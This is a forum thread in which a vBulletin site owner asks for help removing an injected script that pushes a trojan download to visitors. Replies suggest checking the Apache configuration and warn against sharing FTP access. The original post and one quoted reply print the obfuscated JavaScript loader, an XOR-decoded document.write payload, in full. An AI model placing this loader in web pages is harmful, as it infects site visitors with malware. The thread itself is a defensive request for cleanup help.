Results 1 to 6 of 6
  1. #1

    Unhappy Script injected and need help to remove!

    Hello in my domain someone has inserted a script to the vbulletin forum or vbadvance CMPS which downloads a trojan file from other site. So when visitor visit the sites from IE it executes and ask visitor to download that exe file.

    So i am trying so hard to find the file or the way it has been inserted. But still i cant find the way and way to remove it.

    hay i checked and it seems to me some file has been edited or somthing
    in my site. that javascript coming in very top. even b4 HTML tags. What file you think has been edited? I am trying hours to find that file

    its coming like this even b4 the HTML tags in vBa CMPS

    Code:
    <script language="JavaScript">e = '0x00' + '72';str1 = "%C9%91%9A%87%ED%80%81%8A%99%96%CE%D3%87%9A%80%9A%93%9A%99%9A%81%8A%CB%95%9A%91%91%96%9F%D3%CF%C9%9A%97%83%92%9E%96%ED%80%83%90%CE%D3%95%81%81%9D%CB%DC%DC%9A%9F%90%9F%81%DF%90%9C%9E%DC%9C%87%83%DC%D3%ED%84%9A%91%81%95%CE%C2%ED%95%96%9A%94%95%81%CE%C2%CF%C9%DC%9A%97%83%92%9E%96%CF%C9%DC%91%9A%87%CF";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script><script language="JavaScript">e = '0x00' + '72';str1 = "%C9%91%9A%87%ED%80%81%8A%99%96%CE%D3%87%9A%80%9A%93%9A%99%9A%81%8A%CB%95%9A%91%91%96%9F%D3%CF%C9%9A%97%83%92%9E%96%ED%80%83%90%CE%D3%95%81%81%9D%CB%DC%DC%9A%9F%90%9F%81%DF%90%9C%9E%DC%9C%87%83%DC%D3%ED%84%9A%91%81%95%CE%C2%ED%95%96%9A%94%95%81%CE%C2%CF%C9%DC%9A%97%83%92%9E%96%CF%C9%DC%91%9A%87%CF";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html dir="ltr" lang="en">
    <head>
    <title>XXXXXXXXX </title>
    
    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
    <meta name="generator" content="vBulletin 3.5.4" />
    I have patched to 3.5.6 and changed all the FTP passwords too.

    If someone like to help me. I can pm him my site URL too.

    If he like to help me i can give FTP access too. PLEASE HELP ME!! I'm fully screwed up
    Last edited by anon-e-mouse; 11-11-2006 at 02:29 AM.

  2. #2
    Join Date
    Oct 2006
    Posts
    43
    hellow M!ss sameera

    send it please i will check your site

    bye

  3. #3
    Join Date
    Jul 2002
    Location
    Tasmania, Australia
    Posts
    34,797
    Moved to emloyment.
    If you donít like the road youíre walking on, start paving a new one.

  4. #4
    Join Date
    Nov 2004
    Location
    Europe
    Posts
    17
    Quote Originally Posted by sameera

    its coming like this even b4 the HTML tags in vBa CMPS
    Does your server returns this code on EVERY page from that domain or only from vb pages ?
    Vladimir

  5. #5
    Join Date
    May 2006
    Posts
    556
    Quote Originally Posted by sameera
    Hello in my domain someone has inserted a script to the vbulletin forum or vbadvance CMPS which downloads a trojan file from other site. So when visitor visit the sites from IE it executes and ask visitor to download that exe file.

    So i am trying so hard to find the file or the way it has been inserted. But still i cant find the way and way to remove it.

    hay i checked and it seems to me some file has been edited or somthing
    in my site. that javascript coming in very top. even b4 HTML tags. What file you think has been edited? I am trying hours to find that file

    its coming like this even b4 the HTML tags in vBa CMPS

    Code:
    <script language="JavaScript">e = '0x00' + '72';str1 = "%C9%91%9A%87%ED%80%81%8A%99%96%CE%D3%87%9A%80%9A%93%9A%99%9A%81%8A%CB%95%9A%91%91%96%9F%D3%CF%C9%9A%97%83%92%9E%96%ED%80%83%90%CE%D3%95%81%81%9D%CB%DC%DC%9A%9F%90%9F%81%DF%90%9C%9E%DC%9C%87%83%DC%D3%ED%84%9A%91%81%95%CE%C2%ED%95%96%9A%94%95%81%CE%C2%CF%C9%DC%9A%97%83%92%9E%96%CF%C9%DC%91%9A%87%CF";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script><script language="JavaScript">e = '0x00' + '72';str1 = "%C9%91%9A%87%ED%80%81%8A%99%96%CE%D3%87%9A%80%9A%93%9A%99%9A%81%8A%CB%95%9A%91%91%96%9F%D3%CF%C9%9A%97%83%92%9E%96%ED%80%83%90%CE%D3%95%81%81%9D%CB%DC%DC%9A%9F%90%9F%81%DF%90%9C%9E%DC%9C%87%83%DC%D3%ED%84%9A%91%81%95%CE%C2%ED%95%96%9A%94%95%81%CE%C2%CF%C9%DC%9A%97%83%92%9E%96%CF%C9%DC%91%9A%87%CF";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html dir="ltr" lang="en">
    <head>
    <title>XXXXXXXXX </title>
    
    <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
    <meta name="generator" content="vBulletin 3.5.4" />
    I have patched to 3.5.6 and changed all the FTP passwords too.

    If someone like to help me. I can pm him my site URL too.

    If he like to help me i can give FTP access too. PLEASE HELP ME!! I'm fully screwed up
    I'm just going to give you some advice... Giving out ftp access to anyone under the sun is probably HOW you got this to begin with...

    To save you some money, I thought the creators of this forum software had support?

  6. #6
    Join Date
    Nov 2004
    Location
    Europe
    Posts
    17
    It may be that it has nothing to do with forum files.

    I have seen something pretty much similar when apache conf files were hacked and apache would return such code on every page from infected domain, even those that does not use vb.

    So if this script is injected to every page, I would rather check apache then go through the vb files.
    Vladimir

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •